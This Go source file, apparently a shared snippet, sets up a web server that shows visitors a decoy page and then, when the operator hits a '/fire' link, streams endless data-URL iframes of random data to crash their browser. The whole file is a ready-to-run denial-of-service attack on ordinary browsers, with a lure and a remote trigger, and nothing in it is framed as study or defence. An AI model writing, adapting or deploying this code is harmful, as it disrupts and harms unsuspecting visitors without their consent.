Remotely trigger another browser to crash (without JavaScript)

hai-mark.go

// Send infinite data-URL iframes (with /aim and /fire to remotely trigger)

package main

import (
	"encoding/base64"
	"math/rand"
	"net/http"
	"sync"
)

var wg sync.WaitGroup

func main() {
	wg.Add(1)
	http.HandleFunc("/aim", aim)
	http.HandleFunc("/fire", fire)
	http.HandleFunc("/", flood)
	http.ListenAndServe(":8080", nil)
}

func aim(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	w.Write([]byte("<a href=\"/fire\">FIRE!</a>"))
}

func fire(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	wg.Done()
	w.Write([]byte("Done."))
}

func flood(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	flusher, ok := w.(http.Flusher)
	if !ok {
		return
	}
	w.Write([]byte("<h1>OH HAI MARK</h1><p>Pretend like you're reading something...</p>\n"))
	flusher.Flush()
	data := make([]byte, 16)
	head := []byte("<iframe src=\"data:application/octet-stream;base64,")
	foot := []byte("\"></iframe>")
	wg.Wait()
	for {
		for i := 0; i < 100; i++ {
			_, err := w.Write(head)
			if err != nil {
				return
			}
			rand.Read(data)
			encoder := base64.NewEncoder(base64.StdEncoding, w)
			_, err = encoder.Write(data)
			if err != nil {
				return
			}
			encoder.Close()
			_, err = w.Write(foot)
			if err != nil {
				return
			}
		}
		flusher.Flush()
	}
}